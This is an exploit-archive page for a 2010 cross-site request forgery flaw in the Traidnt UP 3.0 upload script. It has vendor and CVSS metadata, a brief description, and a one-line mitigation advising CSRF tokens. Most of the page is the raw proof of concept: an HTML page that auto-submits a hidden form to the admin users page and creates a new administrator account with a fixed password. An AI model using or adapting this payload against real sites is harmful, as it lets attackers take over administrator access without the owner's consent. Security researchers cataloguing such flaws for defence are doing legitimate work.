header-logo
Suggest Exploit
vendor:
Traidnt UP
by:
G0D-F4Th3r
8,8
CVSS
HIGH
Cross-Site Request Forgery (CSRF)
352
CWE
Product Name: Traidnt UP
Affected Version From: 3.0
Affected Version To: 3.0
Patch Exists: NO
Related CWE: N/A
CPE: traidntup.googlecode.com/files/TraidntupV3.0.zip
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

Traidnt UP – CSRF Add Admin Account

This exploit allows an attacker to add an admin account to the Traidnt UP software by sending a malicious POST request to the users.php page. The POST request contains the username, password, email, birthdate, country, and group of the new admin account.

Mitigation:

Implementing a CSRF token in the POST request can prevent this attack.
Source

Exploit-DB raw data:

# Exploit Title: Traidnt UP - CSRF Add Admin Account
# Date: 24-09-2010
# Author: G0D-F4Th3r
# Software Link: http://www.traidnt.net
# Software Download:
http://traidntup.googlecode.com/files/Traidnt%20up%20V3.0.zip
# Version: 3.0
#######################Exploit#######################################
<html>
<body onload="javascript:fireForms()">
<form method="POST" name="form0" action="
http://www.site.com/[path]/admin/users.php?do=addnew">
<input type="hidden" name="name" value="admin2"/>
<input type="hidden" name="password" value="123456"/>
<input type="hidden" name="email" value="mail@mail.com"/>
<input type="hidden" name="birthdate" value="1985"/>
<input type="hidden" name="country" value="Saudi Arabia"/>
<input type="hidden" name="group" value="1"/>
</form>
</body>
</html>